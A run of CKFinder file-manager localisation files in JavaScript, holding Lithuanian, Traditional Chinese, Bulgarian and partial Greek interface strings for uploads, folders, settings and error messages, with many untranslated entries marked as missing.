įkėlimas, prašau palaukite...)', UploadBtn : 'Įkelti pasirinktą failą', UploadBtnCancel : 'Atšaukti', UploadNoFileMsg : 'Pasirinkite failą iš savo kompiuterio', UploadNoFolder : 'Pasirinkite segtuvą prieš įkeliant.', UploadNoPerms : 'Failų įkėlimas uždraustas.', UploadUnknError : 'Įvyko klaida siunčiant failą.', UploadExtIncorrect : 'Šiame segtuve toks failų plėtinys yra uždraustas.', // Flash Uploads UploadLabel : 'Įkeliami failai', UploadTotalFiles : 'Iš viso failų:', UploadTotalSize : 'Visa apimtis:', UploadSend : 'Įkelti', UploadAddFiles : 'Pridėti failus', UploadClearFiles : 'Išvalyti failus', UploadCancel : 'Atšaukti nusiuntimą', UploadRemove : 'Pašalinti', UploadRemoveTip : 'Pašalinti !f', UploadUploaded : 'Įkeltas !n%', UploadProcessing : 'Apdorojama...', // Settings Panel SetTitle : 'Nustatymai', SetView : 'Peržiūrėti:', SetViewThumb : 'Miniatiūros', SetViewList : 'Sąrašas', SetDisplay : 'Rodymas:', SetDisplayName : 'Failo pavadinimas', SetDisplayDate : 'Data', SetDisplaySize : 'Failo dydis', SetSort : 'Rūšiavimas:', SetSortName : 'pagal failo pavadinimą', SetSortDate : 'pagal datą', SetSortSize : 'pagal apimtį', SetSortExtension : 'pagal plėtinį', // Status Bar FilesCountEmpty : '<Tuščias segtuvas>', FilesCountOne : '1 failas', FilesCountMany : '%1 failai', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Užklausos įvykdyti nepavyko. (Klaida %1)', Errors : { 10 : 'Neteisinga komanda.', 11 : 'Resurso rūšis nenurodyta užklausoje.', 12 : 'Neteisinga resurso rūšis.', 102 : 'Netinkamas failas arba segtuvo pavadinimas.', 103 : 'Nepavyko įvykdyti užklausos dėl autorizavimo apribojimų.', 104 : 'Nepavyko įvykdyti užklausos dėl failų sistemos leidimų apribojimų.', 105 : 'Netinkamas failo plėtinys.', 109 : 'Netinkama užklausa.', 110 : 'Nežinoma klaida.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Failas arba segtuvas su tuo pačiu pavadinimu jau yra.', 116 : 'Segtuvas nerastas. Pabandykite atnaujinti.', 117 : 'Failas nerastas. Pabandykite atnaujinti failų sąrašą.', 118 : 'Šaltinio ir nurodomos vietos nuorodos yra vienodos.', 201 : 'Failas su tuo pačiu pavadinimu jau tra. Įkeltas failas buvo pervadintas į "%1"', 202 : 'Netinkamas failas', 203 : 'Netinkamas failas. Failo apimtis yra per didelė.', 204 : 'Įkeltas failas yra pažeistas.', 205 : 'Nėra laikinojo segtuvo skirto failams įkelti.', 206 : 'Įkėlimas bus nutrauktas dėl saugumo sumetimų. Šiame faile yra HTML duomenys.', 207 : 'Įkeltas failas buvo pervadintas į "%1"', 300 : 'Failų perkėlimas nepavyko.', 301 : 'Failų kopijavimas nepavyko.', 500 : 'Failų naršyklė yra išjungta dėl saugumo nustaymų. Prašau susisiekti su sistemų administratoriumi ir patikrinkite CKFinder konfigūracinį failą.', 501 : 'Miniatiūrų palaikymas išjungtas.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Failo pavadinimas negali būti tuščias', FileExists : 'Failas %s jau egzistuoja', FolderEmpty : 'Segtuvo pavadinimas negali būti tuščias', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Failo pavadinimas negali turėti bent vieno iš šių simbolių: \n\\ / : * ? " < > |', FolderInvChar : 'Segtuvo pavadinimas negali turėti bent vieno iš šių simbolių: \n\\ / : * ? " < > |', PopupBlockView : 'Nepavyko atidaryti failo naujame lange. Prašau pakeiskite savo naršyklės nustatymus, kad būtų leidžiami iškylantys langai šiame tinklapyje.', XmlError : 'Nepavyko įkrauti XML atsako iš web serverio.', XmlEmpty : 'Nepavyko įkrauti XML atsako iš web serverio. Serveris gražino tuščią užklausą.', XmlRawResponse : 'Vientisas atsakas iš serverio: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Keisti matmenis %s', sizeTooBig : 'Negalima nustatyti aukščio ir pločio į didesnius nei originalaus paveiksliuko (%size).', resizeSuccess : 'Paveiksliuko matmenys pakeisti.', thumbnailNew : 'Sukurti naują miniatiūrą', thumbnailSmall : 'Mažas (%s)', thumbnailMedium : 'Vidutinis (%s)', thumbnailLarge : 'Didelis (%s)', newSize : 'Nustatyti naujus matmenis', width : 'Plotis', height : 'Aukštis', invalidHeight : 'Neteisingas aukštis.', invalidWidth : 'Neteisingas plotis.', invalidName : 'Neteisingas pavadinimas.', newImage : 'Sukurti naują paveiksliuką', noExtensionChange : 'Failo plėtinys negali būti pakeistas.', imageSmall : 'Šaltinio paveiksliukas yra per mažas', contextMenuName : 'Pakeisti matmenis', lockRatio : 'Išlaikyti matmenų santykį', resetSize : 'Nustatyti dydį iš naujo' }, // Fileeditor plugin Fileeditor : { save : 'Išsaugoti', fileOpenError : 'Nepavyko atidaryti failo.', fileSaveSuccess : 'Failas sėkmingai išsaugotas.', contextMenuName : 'Redaguoti', loadingFile : 'Įkraunamas failas, prašau palaukite...' }, Maximize : { maximize : 'Padidinti', minimize : 'Sumažinti' }, Gallery : { current : 'Nuotrauka {current} iš {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Chinese (Taiwan) * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['zh-tw'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, unavailable</span>', // MISSING confirmCancel : 'Some of the options were changed. Are you sure you want to close the dialog window?', // MISSING ok : 'OK', // MISSING cancel : 'Cancel', // MISSING confirmationTitle : 'Confirmation', // MISSING messageTitle : 'Information', // MISSING inputTitle : 'Question', // MISSING undo : 'Undo', // MISSING redo : 'Redo', // MISSING skip : 'Skip', // MISSING skipAll : 'Skip all', // MISSING makeDecision : 'What action should be taken?', // MISSING rememberDecision: 'Remember my decision' // MISSING }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'zh-tw', LangCode : 'zh-tw', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'mm/dd/yyyy HH:MM', DateAmPm : ['上午', '下午'], // Folders FoldersTitle : '目錄', FolderLoading : '載入中...', FolderNew : '請輸入新目錄名稱: ', FolderRename : '請輸入新目錄名稱: ', FolderDelete : '確定刪除 "%1" 這個目錄嗎?', FolderRenaming : ' (修改目錄...)', FolderDeleting : ' (刪除目錄...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : '請輸入新檔案名稱: ', FileRenameExt : '確定變更這個檔案的副檔名嗎? 變更後 , 此檔案可能會無法使用 !', FileRenaming : '修改檔案名稱...', FileDelete : '確定要刪除這個檔案 "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : '載入中...', FilesEmpty : 'The folder is empty.', // MISSING DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Basket', // MISSING BasketClear : 'Clear Basket', // MISSING BasketRemove : 'Remove from Basket', // MISSING BasketOpenFolder : 'Open Parent Folder', // MISSING BasketTruncateConfirm : 'Do you really want to remove all files from the basket?', // MISSING BasketRemoveConfirm : 'Do you really want to remove the file "%1" from the basket?', // MISSING BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'No files in the basket, drag and drop some.', // MISSING BasketCopyFilesHere : 'Copy Files from Basket', // MISSING BasketMoveFilesHere : 'Move Files from Basket', // MISSING // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : '上傳檔案', UploadTip : '上傳一個新檔案', Refresh : '重新整理', Settings : '偏好設定', Help : '說明', HelpTip : '說明', // Context Menus Select : '選擇', SelectThumbnail : 'Select Thumbnail', // MISSING View : '瀏覽', Download : '下載', NewSubFolder : '建立新子目錄', Rename : '重新命名', Delete : '刪除', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copy Here', // MISSING MoveDragDrop : 'Move Here', // MISSING // Dialogs RenameDlgTitle : 'Rename', // MISSING NewNameDlgTitle : 'New Name', // MISSING FileExistsDlgTitle : 'File Already Exists', // MISSING SysErrorDlgTitle : 'System Error', // MISSING FileOverwrite : 'Overwrite', // MISSING FileAutorename : 'Auto-rename', // MISSING ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : '確定', CancelBtn : '取消', CloseBtn : '關閉', // Upload Panel UploadTitle : '上傳新檔案', UploadSelectLbl : '請選擇要上傳的檔案', UploadProgressLbl : '(檔案上傳中 , 請稍候...)', UploadBtn : '將檔案上傳到伺服器', UploadBtnCancel : '取消', UploadNoFileMsg : '請從你的電腦選擇一個檔案.', UploadNoFolder : 'Please select a folder before uploading.', // MISSING UploadNoPerms : 'File upload not allowed.', // MISSING UploadUnknError : 'Error sending the file.', // MISSING UploadExtIncorrect : 'File extension not allowed in this folder.', // MISSING // Flash Uploads UploadLabel : 'Files to Upload', // MISSING UploadTotalFiles : 'Total Files:', // MISSING UploadTotalSize : 'Total Size:', // MISSING UploadSend : '上傳檔案', UploadAddFiles : 'Add Files', // MISSING UploadClearFiles : 'Clear Files', // MISSING UploadCancel : 'Cancel Upload', // MISSING UploadRemove : 'Remove', // MISSING UploadRemoveTip : 'Remove !f', // MISSING UploadUploaded : 'Uploaded !n%', // MISSING UploadProcessing : 'Processing...', // MISSING // Settings Panel SetTitle : '設定', SetView : '瀏覽方式:', SetViewThumb : '縮圖預覽', SetViewList : '清單列表', SetDisplay : '顯示欄位:', SetDisplayName : '檔案名稱', SetDisplayDate : '檔案日期', SetDisplaySize : '檔案大小', SetSort : '排序方式:', SetSortName : '依 檔案名稱', SetSortDate : '依 檔案日期', SetSortSize : '依 檔案大小', SetSortExtension : 'by Extension', // MISSING // Status Bar FilesCountEmpty : '<此目錄沒有任何檔案>', FilesCountOne : '1 個檔案', FilesCountMany : '%1 個檔案', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', // MISSING Gb : '%1 GB', // MISSING SizePerSecond : '%1/s', // MISSING // Connector Error Messages. ErrorUnknown : '無法連接到伺服器 ! (錯誤代碼 %1)', Errors : { 10 : '不合法的指令.', 11 : '連接過程中 , 未指定資源形態 !', 12 : '連接過程中出現不合法的資源形態 !', 102 : '不合法的檔案或目錄名稱 !', 103 : '無法連接:可能是使用者權限設定錯誤 !', 104 : '無法連接:可能是伺服器檔案權限設定錯誤 !', 105 : '無法上傳:不合法的副檔名 !', 109 : '不合法的請求 !', 110 : '不明錯誤 !', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : '檔案或目錄名稱重複 !', 116 : '找不到目錄 ! 請先重新整理 , 然後再試一次 !', 117 : '找不到檔案 ! 請先重新整理 , 然後再試一次 !', 118 : 'Source and target paths are equal.', // MISSING 201 : '伺服器上已有相同的檔案名稱 ! 您上傳的檔案名稱將會自動更改為 "%1".', 202 : '不合法的檔案 !', 203 : '不合法的檔案 ! 檔案大小超過預設值 !', 204 : '您上傳的檔案已經損毀 !', 205 : '伺服器上沒有預設的暫存目錄 !', 206 : '檔案上傳程序因為安全因素已被系統自動取消 ! 可能是上傳的檔案內容包含 HTML 碼 !', 207 : '您上傳的檔案名稱將會自動更改為 "%1".', 300 : 'Moving file(s) failed.', // MISSING 301 : 'Copying file(s) failed.', // MISSING 500 : '因為安全因素 , 檔案瀏覽器已被停用 ! 請聯絡您的系統管理者並檢查 CKFinder 的設定檔 config.php !', 501 : '縮圖預覽功能已被停用 !' }, // Other Error Messages. ErrorMsg : { FileEmpty : '檔案名稱不能空白 !', FileExists : 'File %s already exists.', // MISSING FolderEmpty : '目錄名稱不能空白 !', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : '檔案名稱不能包含以下字元: \n\\ / : * ? " < > |', FolderInvChar : '目錄名稱不能包含以下字元: \n\\ / : * ? " < > |', PopupBlockView : '無法在新視窗開啟檔案 ! 請檢查瀏覽器的設定並且針對這個網站 關閉 <封鎖彈跳視窗> 這個功能 !', XmlError : 'It was not possible to properly load the XML response from the web server.', // MISSING XmlEmpty : 'It was not possible to load the XML response from the web server. The server returned an empty response.', // MISSING XmlRawResponse : 'Raw response from the server: %s' // MISSING }, // Imageresize plugin Imageresize : { dialogTitle : 'Resize %s', // MISSING sizeTooBig : 'Cannot set image height or width to a value bigger than the original size (%size).', // MISSING resizeSuccess : 'Image resized successfully.', // MISSING thumbnailNew : 'Create a new thumbnail', // MISSING thumbnailSmall : 'Small (%s)', // MISSING thumbnailMedium : 'Medium (%s)', // MISSING thumbnailLarge : 'Large (%s)', // MISSING newSize : 'Set a new size', // MISSING width : 'Width', // MISSING height : 'Height', // MISSING invalidHeight : 'Invalid height.', // MISSING invalidWidth : 'Invalid width.', // MISSING invalidName : 'Invalid file name.', // MISSING newImage : 'Create a new image', // MISSING noExtensionChange : 'File extension cannot be changed.', // MISSING imageSmall : 'Source image is too small.', // MISSING contextMenuName : 'Resize', // MISSING lockRatio : 'Lock ratio', // MISSING resetSize : 'Reset size' // MISSING }, // Fileeditor plugin Fileeditor : { save : 'Save', // MISSING fileOpenError : 'Unable to open file.', // MISSING fileSaveSuccess : 'File saved successfully.', // MISSING contextMenuName : 'Edit', // MISSING loadingFile : 'Loading file, please wait...' // MISSING }, Maximize : { maximize : 'Maximize', // MISSING minimize : 'Minimize' // MISSING }, Gallery : { current : 'Image {current} of {total}' // MISSING }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Bulgarian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['bg'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, недостъпно</span>', confirmCancel : 'Някои от опциите са променени, желаете ли да затворите диалоговия прозорец?', ok : 'ОК', cancel : 'Отказ', confirmationTitle : 'Потвърждение', messageTitle : 'Информация', inputTitle : 'Въпрос', undo : 'Възтанови', redo : 'Предишно', skip : 'Прескочи', skipAll : 'Прескочи всички', makeDecision : 'Какво действие ще бъде предприето?', rememberDecision: 'Запомни ми избора' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'bg', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd/m/yyyy h:MM aa', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Папки', FolderLoading : 'Зареждане...', FolderNew : 'Моля въведете име на новата папка: ', FolderRename : 'Моля въведете име на новата папка: ', FolderDelete : 'Сигурни ли сте, че желаете да изтриете папката "%1"?', FolderRenaming : ' (Преименуване...)', FolderDeleting : ' (Изтриване...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Моля въведете име на файл: ', FileRenameExt : 'Сигурни ли сте, че желаете да промените файловото разширение? Файлът може да стане неизползваем.', FileRenaming : 'Преименуване...', FileDelete : 'Сигурни ли сте, че желаете да изтриете "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Зареждане...', FilesEmpty : 'Папката е празна.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Кошница', BasketClear : 'Изчисти кошницата', BasketRemove : 'Премахни от кошницата', BasketOpenFolder : 'Отвори основната папка', BasketTruncateConfirm : 'Наиситина ли желаете да премахнете всичко файлове от кошницата?', BasketRemoveConfirm : 'Наистина ли желаете да премахнете файла "%1" от кошницата?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Няма файлове в кошницата.', BasketCopyFilesHere : 'Копиране на файлове от кошницата', BasketMoveFilesHere : 'Местене на файлове от кошницата', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Качване', UploadTip : 'Качване на нов файл', Refresh : 'Опресняване', Settings : 'Настройки', Help : 'Помощ', HelpTip : 'Помощ', // Context Menus Select : 'Изберете', SelectThumbnail : 'Изберете миниатюра', View : 'Виж', Download : 'Изтегли', NewSubFolder : 'Нов подпапка', Rename : 'Преименуване', Delete : 'Изтриване', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Копиране тук', MoveDragDrop : 'Местене тук', // Dialogs RenameDlgTitle : 'Преименуване', NewNameDlgTitle : 'Ново име', FileExistsDlgTitle : 'Файлът вече съществува', SysErrorDlgTitle : 'Системна грешка', FileOverwrite : 'Препокриване', FileAutorename : 'Авто-преименуване', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'ОК', CancelBtn : 'Октаз', CloseBtn : 'Затвори', // Upload Panel UploadTitle : 'Качване на нов файл', UploadSelectLbl : 'Изберете файл за качване', UploadProgressLbl : '(Качва се в момента, моля изчакайте...)', UploadBtn : 'Качване на избрания файл', UploadBtnCancel : 'Отказ', UploadNoFileMsg : 'Моля изберете файл от Вашия компютър.', UploadNoFolder : 'Моля изберете файл за качване.', UploadNoPerms : 'Качването на файлове не е позволено.', UploadUnknError : 'Проблем с изпращането на файла.', UploadExtIncorrect : 'Файловото разширение не е позволено за тази папка.', // Flash Uploads UploadLabel : 'Файлове за качване', UploadTotalFiles : 'Общо файлове:', UploadTotalSize : 'Общ размер:', UploadSend : 'Качване', UploadAddFiles : 'Добави файлове', UploadClearFiles : 'Изчисти', UploadCancel : 'Отказ от качването', UploadRemove : 'Премахни', UploadRemoveTip : 'Премахни !f', UploadUploaded : 'Качено !n%', UploadProcessing : 'Обработва се...', // Settings Panel SetTitle : 'Настройки', SetView : 'Изглед:', SetViewThumb : 'Миниатюри', SetViewList : 'Списък', SetDisplay : 'Екран:', SetDisplayName : 'Име на файл', SetDisplayDate : 'Дата', SetDisplaySize : 'Размер на файл', SetSort : 'Подреждане:', SetSortName : 'по име на файл', SetSortDate : 'по дата', SetSortSize : 'по размер', SetSortExtension : 'по разширение', // Status Bar FilesCountEmpty : '<празна папка>', FilesCountOne : '1 файл', FilesCountMany : '%1 файла', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Не е възможно да се извърши заявката. (ГРЕШКА %1)', Errors : { 10 : 'Невалидна команда.', 11 : 'Типът на ресурса не е определен в заявката.', 12 : 'Заявеният тип на ресурса не е намерен.', 102 : 'Невалиден файл или име на папка.', 103 : 'Не е възможно да се извърши действието заради проблем с идентификацията.', 104 : 'Не е възможно да се извърши действието заради проблем с правата.', 105 : 'Невалидно файлово разширение.', 109 : 'Невалидна заявка.', 110 : 'Неизвестна грешка.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Файл или папка със същото име вече съществува.', 116 : 'Папката не е намерена, опреснете и опитайте отново.', 117 : 'Файлът не е намерен, опреснете и опитайте отново.', 118 : 'Пътищата за цел и източник трябва да са еднакви.', 201 : 'Файл с такова име съществува, каченият файл е преименуван на "%1".', 202 : 'Невалиден файл.', 203 : 'Невалиден файл. Размерът е прекалено голям.', 204 : 'Каченият файл е повреден.', 205 : 'Няма временна папка за качените файлове.', 206 : 'Качването е спряно заради проблеми със сигурността. Файлът съдържа HTML данни.', 207 : 'Каченият файл е преименуван на "%1".', 300 : 'Преместването на файловете пропадна.', 301 : 'Копирането на файловете пропадна.', 500 : 'Файловият браузър е изключен заради проблеми със сигурността. Моля свържете се с Вашия системен администратор и проверете конфигурацията.', 501 : 'Поддръжката за миниатюри е изключена.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Името на файла не може да празно.', FileExists : 'Файлът %s вече е наличен.', FolderEmpty : 'Името на папката не може да празно.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Името на файла не може да съдържа следните знаци: \n\\ / : * ? " < > |', FolderInvChar : 'Името на папката не може да съдържа следните знаци: \n\\ / : * ? " < > |', PopupBlockView : 'Не е възможно отварянето на файла в нов прозорец. Моля конфигурирайте браузъра си и изключете блокирането на изкачащи прозорци за този сайт.', XmlError : 'Не е възможно зареждането да данни чрез XML от уеб сървъра.', XmlEmpty : 'Не е възможно зареждането на XML данни от уеб сървъра. Сървърът върна празен отговор.', XmlRawResponse : 'Отговор от сървъра: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Оразмеряване %s', sizeTooBig : 'Не бе възможно оразмеряването, защото зададените размери са по-големи от оригинала (%size).', resizeSuccess : 'Снимката е оразмерена успешно.', thumbnailNew : 'Създаване на миниатюра', thumbnailSmall : 'Малка (%s)', thumbnailMedium : 'Средна (%s)', thumbnailLarge : 'Голяма (%s)', newSize : 'Изберете нов размер', width : 'Ширина', height : 'Височина', invalidHeight : 'Невалидна височина.', invalidWidth : 'Невалидна ширина.', invalidName : 'Невалидно име на файл.', newImage : 'Създаване на нова снимка', noExtensionChange : 'Файловото разширение не може да бъде сменено.', imageSmall : 'Оригиналната снимка е прекалено малка.', contextMenuName : 'Оразмеряване', lockRatio : 'Заключване на съотношението', resetSize : 'Нулиране на размера' }, // Fileeditor plugin Fileeditor : { save : 'Запис', fileOpenError : 'Невъзможно отваряне на файла.', fileSaveSuccess : 'Файлът е записан успешно.', contextMenuName : 'Промяна', loadingFile : 'Зареждане на файл, моля почакайте...' }, Maximize : { maximize : 'Максимизиране', minimize : 'Минимизиране' }, Gallery : { current : 'Снимка {current} от общо {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Greek * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['el'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, μη διαθέσιμο</span>', confirmCancel : 'Κάποιες από τις επιλογές έχουν αλλάξει. Θέλετε σίγουρα να κλείσετε το παράθυρο διαλόγου;', ok : 'OK', cancel : 'Ακύρωση', confirmationTitle : 'Επιβεβαίωση', messageTitle : 'Πληροφορίες', inputTitle : 'Ερώτηση', undo : 'Αναίρεση', redo : 'Επαναφορά', skip : 'Παράβλεψη', skipAll : 'Παράβλεψη όλων', makeDecision : 'Ποια ενέργεια πρέπει να ληφθεί;', rememberDecision: 'Να θυμάσαι την απόφασή μου' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'el', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy HH:MM', DateAmPm : ['ΜΜ', 'ΠΜ'], // Folders FoldersTitle : 'Φάκελοι', FolderLoading : 'Φόρτωση...', FolderNew : 'Παρακαλούμε πληκτρολογήστε την ονομασία του νέου φακέλου: ', FolderRename : 'Παρακαλούμε πληκτρολογήστε την νέα ονομασία του φακέλου: ', FolderDelete : 'Είστε σίγουροι ότι θέλετε να διαγράψετε το φάκελο "%1";', FolderRenaming : ' (Μετονομασία...)', FolderDeleting : ' (Διαγραφή...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Παρακαλούμε πληκτρολογήστε την νέα ονομασία του αρχείου: ', FileRenameExt : 'Είστε σίγουροι ότι θέλετε να αλλάξετε την επέκταση του αρχείου; Μετά από αυτή την ενέργεια το αρχείο είναι δυνατόν να μην μπορεί να χρησιμοποιηθεί', FileRenaming : 'Μετονομασία...', FileDelete : 'Είστε σίγουροι ότι θέλετε να διαγράψετε το αρχείο "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Φόρτωση...', FilesEmpty : 'Ο φάκελος είναι κενός.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Καλάθι', BasketClear : 'Καθαρισμός καλαθιού', BasketRemove : 'Αφαίρεση από το καλάθι', BasketOpenFolder : 'Άνοιγμα γονικού φακέλου', BasketTruncateConfirm : 'Θέλετε σίγουρα να αφαιρέσετε όλα τα αρχεία από το καλάθι;', BasketRemoveConfirm : 'Θέλετε σίγουρα να αφαιρέσετε το αρχείο "%1" από το καλάθι;', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Δεν υπάρχουν αρχεία στο καλάθι, μεταφέρετε κάποια με drag and drop.', BasketCopyFilesHere : 'Αντιγραφή αρχείων από το καλάθι', BasketMoveFilesHere : 'Μετακίνηση αρχείων από το καλάθι', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Μεταφόρτωση', UploadTip : 'Μεταφόρτωση νέου αρχείου', Refresh : 'Ανανέωση', Settings : 'Ρυθμίσεις', Help : 'Βοήθεια', HelpTip : 'Βοήθεια', // Context Menus Select : 'Επιλογή', SelectThumbnail : 'Επιλογή μικρογραφίας', View : 'Προβολή', Download : 'Λήψη αρχείου', NewSubFolder : 'Νέος υποφάκελος', Rename : 'Μετονομασία', Delete : 'Διαγραφή', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Αντέγραψε εδώ', MoveDragDrop : 'Μετακίνησε εδώ', // Dialogs RenameDlgTitle : 'Μετονομασία', NewNameDlgTitle : 'Νέα ονομασία', FileExistsDlgTitle : 'Το αρχείο υπάρχει ήδη', SysErrorDlgTitle : 'Σφάλμα συστήματος', FileOverwrite : 'Αντικατάσταση αρχείου', FileAutorename : 'Αυτόματη-μετονομασία', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Ακύρωση', CloseBtn : 'Κλείσιμο', // Upload Panel UploadTitle : 'Μεταφόρτωση νέου αρχείου', UploadSelectLbl : 'επιλέξτε το αρχείο που θέλετε να μεταφερθεί κάνοντας κλίκ στο κουμπί', UploadProgressLbl : '(Η μεταφόρτωση εκτελείται, παρακαλούμε περιμένετε...)', UploadBtn : 'Μεταφόρτωση 